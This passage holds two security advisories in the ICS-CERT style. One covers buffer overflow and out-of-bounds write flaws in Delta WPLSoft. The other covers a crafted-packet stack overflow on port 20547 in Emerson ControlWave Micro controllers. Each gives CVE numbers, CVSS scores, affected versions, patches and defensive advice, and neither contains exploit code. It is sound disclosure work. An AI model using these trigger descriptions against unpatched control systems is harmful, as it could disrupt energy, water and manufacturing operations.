Company Headquarters Location: Germany

Delta Electronics WPLSoft

CVSS v3 8.3

ATTENTION: Remotely exploitable/low skill level to exploit.

Vendor: Delta Electronics

Equipment: WPLSoft

Vulnerabilities: Stack-based Buffer Overflow, Heap-based Buffer Overflow, Out-of-bounds Write.

AFFECTED PRODUCTS

The following versions of WPLSoft, a PLC programming software, are affected:

  • WPLSoft, Versions 2.45.0 and prior.

IMPACT

Successful exploitation of these vulnerabilities could allow remote code execution or cause the software the attacker is accessing to crash.

MITIGATION

Delta Electronics recommends affected users update their software to the latest version of WPLSoft V2.46.0 that is available at the following location:

http://www.deltaww.com/Products/PluginWebUserControl/downloadCenterCounter.aspx?DID=5043&DocPath=1&hl=en-US

Additionally, Delta recommends users restrict the application’s interaction with trusted files.

NCCIC recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:

  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

NCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

NCCIC also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

Additional mitigation guidance and recommended practices are publicly available in the NCCIC Technical Information Paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT website.

Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.

No known public exploits specifically target these vulnerabilities.

VULNERABILITY OVERVIEW

The application utilizes a fixed length stack buffer where a value larger than the buffer can be read from a file into the buffer, causing the buffer to be overwritten, which may allow remote code execution or cause the application to crash.

CVE-2018-7494 has been assigned to this vulnerability. A CVSS v3 base score of 8.3 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:H).

The application utilizes a fixed length heap buffer where a value larger than the buffer can be read from a file into the buffer, causing the buffer to be overwritten, which may allow remote code execution or cause the application to crash.

CVE-2018-7507 has been assigned to this vulnerability. A CVSS v3 base score of 8.3 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:H).

The application writes data from a file outside the bounds of the intended buffer space, which could cause memory corruption or may allow remote code execution.

CVE-2018-7509 has been assigned to this vulnerability. A CVSS v3 base score of 8.3 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:H).

RESEARCHER

Axt working with Trend Micro’s Zero Day Initiative reported these vulnerabilities to NCCIC.

BACKGROUND

Critical Infrastructure Sectors: Commercial Facilities, Critical Manufacturing, Energy

Countries/Areas Deployed: Asia, Europe, United States

Company Headquarters Location: Taiwan

Emerson ControlWave Micro Process Automation Controller

CVSS v3 7.5

ATTENTION: Remotely exploitable/low skill level to exploit.

Vendor: Emerson Process Management LLLP

Equipment: ControlWave Micro Process Automation Controller

Vulnerability: Stack-based Buffer Overflow

AFFECTED PRODUCTS

The following versions of ControlWave Micro firmware, a family of SCADA RTUs, PLCs, PACs, and flow computers, are affected:

  • ControlWave Micro [ProConOS v.4.01.280] – firmware: CWM v.05.78.00 and prior.

IMPACT

Exploitation may possibly cause a halt of Ethernet functionality, requiring a cold start to restore the system as well as communications related to ControlWave Designer access. This can possibly result in a loss of system availability and disruption in communications with other connected devices.

MITIGATION

Emerson offers the following mitigation advice:

  • Assess which ControlWave products in your organization have Ethernet connectivity.
  • Upgrade the affected devices to firmware version 05.79.00 to correct this possible action. System firmware upgrade instructions are available in product documentation (ControlWave Micro Process Automation Controller Instruction Manual, part D301392X012).
  • The resolution described is available only to the user when appropriately incorporated into the application running in ControlWave Micro firmware.
  • Prior to upgrading the system firmware, always perform a full alarm and historical collection (archive files as well as audit logs).

The release notes and firmware upgrade are available to registered users at the following link:

http://www3.emersonprocess.com/remote/support/v2/login.html.

NCCIC recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:

  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

NCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

NCCIC also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

Additional mitigation guidance and recommended practices are publicly available in the NCCIC Technical Information Paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT website.

Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.

No known public exploits specifically target this vulnerability.

VULNERABILITY OVERVIEW

A stack-based buffer overflow vulnerability caused by sending crafted packets on Port 20547 could force the PLC to change its state into halt mode.

CVE-2018-5452 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).

RESEARCHER

Younes Dragoni of Nozomi Networks reported this vulnerability to NCCIC.

BACKGROUND

Critical Infrastructure Sectors: Energy, Water and Wastewater Systems

Countries/Areas Deployed: Worldwide

Company Headquarters Location: Minnesota, USA